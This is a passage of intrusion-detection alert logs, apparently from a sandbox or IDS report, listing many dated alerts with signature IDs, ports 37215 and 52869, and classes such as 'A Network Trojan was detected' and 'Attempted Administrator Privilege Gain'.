                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.640312
                      SID:2829579
                      Source Port:34864
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.981855
                      SID:2835222
                      Source Port:46582
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.340201
                      SID:2027339
                      Source Port:37918
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.985099
                      SID:2025132
                      Source Port:51738
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:47.766845
                      SID:2831300
                      Source Port:49744
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:34.045144
                      SID:2829579
                      Source Port:51684
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.659435
                      SID:2831300
                      Source Port:51832
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.637859
                      SID:2025132
                      Source Port:39736
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:53.581574
                      SID:2025132
                      Source Port:55926
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:06.989167
                      SID:2835222
                      Source Port:54882
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.589759
                      SID:2027339
                      Source Port:35948
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.115230
                      SID:2027339
                      Source Port:48868
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.591880
                      SID:2831300
                      Source Port:50890
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:00.633642
                      SID:2829579
                      Source Port:42434
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.559170
                      SID:2027339
                      Source Port:47126
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.286738
                      SID:2829579
                      Source Port:54904
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.653586
                      SID:2835222
                      Source Port:33690
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.022763
                      SID:2835222
                      Source Port:57968
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.874054
                      SID:2831300
                      Source Port:37088
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:50.147840
                      SID:2025132
                      Source Port:34522
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.839255
                      SID:2027339
                      Source Port:51086
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:25.263099
                      SID:2025132
                      Source Port:33996
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.965131
                      SID:2025132
                      Source Port:41790
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.295497
                      SID:2025132
                      Source Port:36678
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.704900
                      SID:2831300
                      Source Port:56180
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:55.974605
                      SID:2027339
                      Source Port:53306
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.817503
                      SID:2027339
                      Source Port:39336
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.680845
                      SID:2831300
                      Source Port:46268
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.757783
                      SID:2831300
                      Source Port:45030
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.946478
                      SID:2027339
                      Source Port:51148
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.290015
                      SID:2027339
                      Source Port:43800
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.113054
                      SID:2829579
                      Source Port:35512
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.816504
                      SID:2835222
                      Source Port:53168
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:10.491660
                      SID:2027339
                      Source Port:39696
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.204975
                      SID:2829579
                      Source Port:48742
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:50.085627
                      SID:2025132
                      Source Port:42686
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:46.308516
                      SID:2025132
                      Source Port:54334
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:00.856771
                      SID:2027339
                      Source Port:42370
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.018425
                      SID:2829579
                      Source Port:59276
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.169339
                      SID:2829579
                      Source Port:33182
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.322860
                      SID:2835222
                      Source Port:48070
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.221790
                      SID:2835222
                      Source Port:53842
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.641430
                      SID:2027339
                      Source Port:33448
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.113314
                      SID:2831300
                      Source Port:34652
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:52.041756
                      SID:2025132
                      Source Port:36888
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:47.092270
                      SID:2025132
                      Source Port:54620
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:27.650975
                      SID:2835222
                      Source Port:35764
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.602822
                      SID:2027339
                      Source Port:57726
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.043969
                      SID:2829579
                      Source Port:49582
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.104633
                      SID:2027339
                      Source Port:37702
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.649996
                      SID:2829579
                      Source Port:42010
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.747554
                      SID:2027339
                      Source Port:57824
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.938688
                      SID:2027339
                      Source Port:49812
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:58.028191
                      SID:2831300
                      Source Port:40478
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:08.683685
                      SID:2027339
                      Source Port:33344
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.979752
                      SID:2835222
                      Source Port:48092
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.625240
                      SID:2025132
                      Source Port:49526
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:14.100332
                      SID:2829579
                      Source Port:58066
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.098209
                      SID:2835222
                      Source Port:49382
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:20.374641
                      SID:2025132
                      Source Port:41736
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:04.773524
                      SID:2025132
                      Source Port:39008
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.686799
                      SID:2027339
                      Source Port:36000
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.828422
                      SID:2835222
                      Source Port:38350
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.138222
                      SID:2831300
                      Source Port:38704
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:11.816294
                      SID:2829579
                      Source Port:46590
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.096752
                      SID:2835222
                      Source Port:40856
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.954688
                      SID:2831300
                      Source Port:50170
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:07.062666
                      SID:2829579
                      Source Port:48206
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.132103
                      SID:2829579
                      Source Port:35824
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.663245
                      SID:2027339
                      Source Port:37190
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:26.156407
                      SID:2027339
                      Source Port:38898
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.007374
                      SID:2025132
                      Source Port:39942
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:57.222207
                      SID:2835222
                      Source Port:34718
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.509004
                      SID:2831300
                      Source Port:49594
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:04.031511
                      SID:2835222
                      Source Port:44118
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.275004
                      SID:2025132
                      Source Port:59572
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:06.990165
                      SID:2829579
                      Source Port:45840
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.979565
                      SID:2829579
                      Source Port:53294
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.336908
                      SID:2835222
                      Source Port:49188
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.943881
                      SID:2027339
                      Source Port:53742
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.635367
                      SID:2829579
                      Source Port:60530
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.749737
                      SID:2835222
                      Source Port:43122
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.356902
                      SID:2025132
                      Source Port:39898
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:57.221802
                      SID:2829579
                      Source Port:43520
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:25.347089
                      SID:2027339
                      Source Port:45246
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:59.745622
                      SID:2025132
                      Source Port:38058
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:02.387600
                      SID:2025132
                      Source Port:47516
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.520226
                      SID:2027339
                      Source Port:51562
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.494999
                      SID:2025132
                      Source Port:44172
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:59.175742
                      SID:2829579
                      Source Port:58932
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.298541
                      SID:2025132
                      Source Port:39444
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:57.434940
                      SID:2831300
                      Source Port:34012
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:06.990535
                      SID:2835222
                      Source Port:52666
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:59.377547
                      SID:2027339
                      Source Port:49430
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.985200
                      SID:2025132
                      Source Port:48044
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:51.743446
                      SID:2027339
                      Source Port:56730
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:03.953624
                      SID:2025132
                      Source Port:52432
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:48.386032
                      SID:2027339
                      Source Port:41382
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.054762
                      SID:2831300
                      Source Port:32944
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:53.625100
                      SID:2831300
                      Source Port:46808
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:14.140178
                      SID:2025132
                      Source Port:57756
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:34.048825
                      SID:2829579
                      Source Port:49920
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.047411
                      SID:2829579
                      Source Port:43302
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:21.931985
                      SID:2829579
                      Source Port:60650
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.099799
                      SID:2025132
                      Source Port:43384
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:48.918065
                      SID:2025132
                      Source Port:43488
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.599362
                      SID:2027339
                      Source Port:50400
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:06.996056
                      SID:2829579
                      Source Port:56356
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:55.154049
                      SID:2831300
                      Source Port:43950
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.147883
                      SID:2027339
                      Source Port:34030
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:11.703257
                      SID:2025132
                      Source Port:51836
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:40.290003
                      SID:2829579
                      Source Port:42054
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.325694
                      SID:2027339
                      Source Port:40842
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.609855
                      SID:2027339
                      Source Port:38310
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.131607
                      SID:2027339
                      Source Port:50228
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.991545
                      SID:2027339
                      Source Port:47412
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.059102
                      SID:2025132
                      Source Port:57892
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.110964
                      SID:2025132
                      Source Port:46540
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:01.189596
                      SID:2027339
                      Source Port:49348
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.786028
                      SID:2027339
                      Source Port:45846
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.150638
                      SID:2829579
                      Source Port:37246
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.189694
                      SID:2025132
                      Source Port:52172
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.869521
                      SID:2831300
                      Source Port:47750
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.540053
                      SID:2027339
                      Source Port:59742
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:17.865555
                      SID:2027339
                      Source Port:40280
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.717611
                      SID:2831300
                      Source Port:43206
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:59.799089
                      SID:2027339
                      Source Port:44900
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.622888
                      SID:2027339
                      Source Port:53192
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.040812
                      SID:2829579
                      Source Port:49424
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.677519
                      SID:2829579
                      Source Port:40634
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:13.672930
                      SID:2027339
                      Source Port:36658
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.883801
                      SID:2025132
                      Source Port:47262
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:27.381027
                      SID:2027339
                      Source Port:54888
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.033766
                      SID:2835222
                      Source Port:54080
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.312311
                      SID:2831300
                      Source Port:39582
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:47.918473
                      SID:2027339
                      Source Port:39424
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.388927
                      SID:2025132
                      Source Port:36042
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.967549
                      SID:2831300
                      Source Port:49624
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:51.258596
                      SID:2027339
                      Source Port:36072
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.977603
                      SID:2835222
                      Source Port:52170
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.325400
                      SID:2831300
                      Source Port:54428
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:34.044537
                      SID:2835222
                      Source Port:52198
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.617689
                      SID:2027339
                      Source Port:60274
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.375803
                      SID:2027339
                      Source Port:52282
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.188773
                      SID:2027339
                      Source Port:60842
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.776719
                      SID:2831300
                      Source Port:39014
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:41.228794
                      SID:2027339
                      Source Port:42024
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.147727
                      SID:2025132
                      Source Port:38340
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.600114
                      SID:2027339
                      Source Port:58992
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.910426
                      SID:2835222
                      Source Port:50096
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.795218
                      SID:2027339
                      Source Port:48582
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:01.846382
                      SID:2027339
                      Source Port:33600
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.493447
                      SID:2025132
                      Source Port:36278
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:31.314146
                      SID:2831300
                      Source Port:59934
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:31.982478
                      SID:2835222
                      Source Port:59400
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.641498
                      SID:2829579
                      Source Port:57930
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.372003
                      SID:2829579
                      Source Port:59172
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.098080
                      SID:2835222
                      Source Port:39918
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.044693
                      SID:2025132
                      Source Port:41638
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:58.885082
                      SID:2027339
                      Source Port:38460
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:21.954501
                      SID:2829579
                      Source Port:49024
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.118165
                      SID:2835222
                      Source Port:54156
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:50.845923
                      SID:2831300
                      Source Port:41810
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.945747
                      SID:2027339
                      Source Port:48476
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.203130
                      SID:2027339
                      Source Port:34246
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:58.807611
                      SID:2831300
                      Source Port:49242
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:00:59.184421
                      SID:2829579
                      Source Port:41550
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:10.600298
                      SID:2027339
                      Source Port:39780
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.048367
                      SID:2835222
                      Source Port:33230
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.109958
                      SID:2025132
                      Source Port:36090
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:51.144153
                      SID:2027339
                      Source Port:40542
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.015544
                      SID:2027339
                      Source Port:37228
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.414030
                      SID:2831300
                      Source Port:33672
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:48.138392
                      SID:2027339
                      Source Port:58154
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.233857
                      SID:2829579
                      Source Port:39376
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.649945
                      SID:2835222
                      Source Port:41624
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.213564
                      SID:2829579
                      Source Port:36392
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.101588
                      SID:2025132
                      Source Port:35156
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:01.494643
                      SID:2027339
                      Source Port:55240
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.633742
                      SID:2829579
                      Source Port:34184
                      Destination Port:37215
                      Protocol:TCP
